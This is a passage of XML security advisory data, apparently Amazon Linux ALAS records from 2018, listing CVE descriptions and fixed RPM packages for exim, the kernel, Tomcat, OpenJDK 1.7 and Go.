</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6789" title="" id="CVE-2018-6789" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.90.1-2.14.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="2.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-pgsql-4.90.1-2.14.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.90.1-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-971</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-971: important priority package update for kernel</title><issued date="2018-03-16 16:17:00" /><updated date="2018-03-16 22:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1068:
A flaw was found in the Linux kernel&#039;s implementation of 32-bit syscall interface for bridging. This allowed a privileged user to arbitrarily write to a limited range of kernel memory.
1552048:
CVE-2018-1068 kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1068" title="" id="CVE-2018-1068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.85" release="38.58.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-devel-4.9.85-38.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.85" release="38.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.85-38.58.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.85" release="38.58.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.9.85-38.58.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-972</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-972: medium priority package update for tomcat7 tomcat8</title><issued date="2018-03-21 22:06:00" /><updated date="2018-03-23 17:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1305:
Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.
1548282:
CVE-2018-1305 tomcat: Late application of security constraints can lead to resource exposure for unauthorised users
CVE-2018-1304:
The URL pattern of &quot;&quot; (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.
1548289:
CVE-2018-1304 tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1304" title="" id="CVE-2018-1304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1305" title="" id="CVE-2018-1305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-log4j" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package 
name="tomcat7-docs-webapp" version="7.0.85" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.85-1.32.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.29" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.29-1.77.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.29" release="1.77.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.29-1.77.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-973</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-973: medium priority package update for tomcat80</title><issued date="2018-03-21 22:08:00" /><updated date="2018-03-23 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1305:
Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.
1548282:
CVE-2018-1305 tomcat: Late application of security constraints can lead to resource exposure for unauthorised users
CVE-2018-1304:
The URL pattern of &quot;&quot; (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.
1548289:
CVE-2018-1304 tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources
CVE-2017-15706:
As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.
1540828:
CVE-2017-15706 tomcat: Incorrect documentation of CGI Servlet search algorithm may lead to misconfiguration
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15706" title="" id="CVE-2017-15706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1304" title="" id="CVE-2018-1304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1305" title="" id="CVE-2018-1305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat80-servlet-3.1-api" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-servlet-3.1-api-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-lib" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-lib-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-jsp-2.3-api" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-jsp-2.3-api-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-el-3.0-api" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-el-3.0-api-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-webapps" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-webapps-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-docs-webapp" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-docs-webapp-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-javadoc" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-javadoc-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-log4j" version="8.0.50" release="1.79.amzn1" 
epoch="0" arch="noarch"><filename>Packages/tomcat80-log4j-8.0.50-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat80-admin-webapps" version="8.0.50" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-admin-webapps-8.0.50-1.79.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-974</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-974: important priority package update for java-1.7.0-openjdk</title><issued date="2018-03-21 22:12:00" /><updated date="2018-03-23 17:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2678:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534263:
CVE-2018-2678 OpenJDK: unbounded memory allocation in BasicAttributes deserialization (JNDI, 8191142)
CVE-2018-2677:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534288:
CVE-2018-2677 OpenJDK: unbounded memory allocation during deserialization (AWT, 8190289)
CVE-2018-2663:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534296:
CVE-2018-2663 OpenJDK: ArrayBlockingQueue deserialization to an inconsistent state (Libraries, 8189284)
CVE-2018-2641:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N).
1534766:
CVE-2018-2641 OpenJDK: GTK library loading use-after-free (AWT, 8185325)
CVE-2018-2637:
It was discovered that the JMX component of OpenJDK failed to properly set the deserialization filter for the SingleEntryRegistry in certain cases. A remote attacker could possibly use this flaw to bypass intended deserialization restrictions.
1534970:
CVE-2018-2637 OpenJDK: SingleEntryRegistry incorrect setup of deserialization filter (JMX, 8186998)
CVE-2018-2634:
The JGSS component of OpenJDK ignores the value of the javax.security.auth.useSubjectCredsOnly property when using HTTP/SPNEGO authentication and always uses global credentials. It was discovered that this could cause global credentials to be unexpectedly used by an untrusted Java application.
1534943:
CVE-2018-2634 OpenJDK: use of global credentials for HTTP/SPNEGO (JGSS, 8186600)
CVE-2018-2633:
It was discovered that the LDAPCertStore class in the JNDI component of OpenJDK failed to securely handle LDAP referrals. An attacker could possibly use this flaw to make it fetch attacker controlled certificate data.
1535036:
CVE-2018-2633 OpenJDK: LDAPCertStore insecure handling of LDAP referrals (JNDI, 8186606)
CVE-2018-2629:
It was discovered that the JGSS component of OpenJDK failed to properly handle GSS context in the native GSS library wrapper in certain cases. A remote attacker could possibly make a Java application that uses JGSS use a previously freed context.
1534625:
CVE-2018-2629 OpenJDK: GSS context use-after-free (JGSS, 8186212)
CVE-2018-2618:
It was discovered that the key agreement implementations in the JCE component of OpenJDK did not guarantee sufficient strength of the used keys to adequately protect the generated shared secret. This could make it easier to break data encryption by attacking the key agreement rather than the encryption that uses the negotiated secret.
1534762:
CVE-2018-2618 OpenJDK: insufficient strength of key agreement (JCE, 8185292)
CVE-2018-2603:
It was discovered that the Libraries component of OpenJDK failed to sufficiently limit the amount of memory allocated when reading DER-encoded input. A remote attacker could possibly use this flaw to make a Java application use an excessive amount of memory if it parsed attacker-supplied DER-encoded input.
1534553:
CVE-2018-2603 OpenJDK: DerValue unbounded memory allocation (Libraries, 8182387)
CVE-2018-2602:
It was discovered that the I18n component of OpenJDK could use an untrusted search path when loading resource bundle classes. A local attacker could possibly use this flaw to execute arbitrary code as another local user by making that user's Java application load an attacker-controlled class file.
1534525:
CVE-2018-2602 OpenJDK: loading of classes from untrusted locations (I18n, 8182601)
CVE-2018-2599:
It was discovered that the DNS client implementation in the JNDI component of OpenJDK did not use random source ports when sending out DNS queries. This could make it easier for a remote attacker to spoof responses to those queries.
1534543:
CVE-2018-2599 OpenJDK: DnsClient missing source port randomization (JNDI, 8182125)
CVE-2018-2588:
It was discovered that the LDAP component of OpenJDK failed to properly encode special characters in user names when adding them to an LDAP search query. A remote attacker could possibly use this flaw to manipulate LDAP queries performed by the LdapLoginModule class.
1534299:
CVE-2018-2588 OpenJDK: LdapLoginModule insufficient username encoding in LDAP query (LDAP, 8178449)
CVE-2018-2579:
It was discovered that multiple encryption key classes in the Libraries component of OpenJDK did not properly synchronize access to their internal data. This could possibly cause a multi-threaded Java application to apply weak encryption to data because of the use of a key that was zeroed out.
1534298:
CVE-2018-2579 OpenJDK: unsynchronized access to encryption key data (Libraries, 8172525)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2579" title="" id="CVE-2018-2579" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2588" title="" id="CVE-2018-2588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2599" title="" id="CVE-2018-2599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2602" title="" id="CVE-2018-2602" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2603" title="" id="CVE-2018-2603" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2618" title="" id="CVE-2018-2618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2629" title="" id="CVE-2018-2629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2633" title="" id="CVE-2018-2633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2634" title="" id="CVE-2018-2634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2637" title="" id="CVE-2018-2637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2641" title="" id="CVE-2018-2641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2663" title="" id="CVE-2018-2663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2677" title="" id="CVE-2018-2677" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2678" title="" id="CVE-2018-2678" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.171-2.6.13.0.76.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-975</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-975: medium priority package update for golang</title><issued date="2018-03-21 22:13:00" /><updated date="2018-04-19 22:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7187:
The &quot;go get&quot; implementation in Go 1.9.4, when the -insecure command-line option is used, does not validate the import path (get/vcs.go only checks for &quot;://&quot; anywhere in the string), which allows remote attackers to execute arbitrary OS commands via a crafted web site.
1546386:
CVE-2018-7187 golang: arbitrary command execution via VCS path
CVE-2018-6574:
An arbitrary command execution flaw was found in the way Go&#039;s &quot;go get&quot; command handled gcc and clang sensitive options during the build. A remote attacker capable of hosting malicious repositories could potentially use this flaw to cause arbitrary command execution on the client side.
1543561:
CVE-2018-6574 golang: arbitrary code execution during "go get" via C compiler options
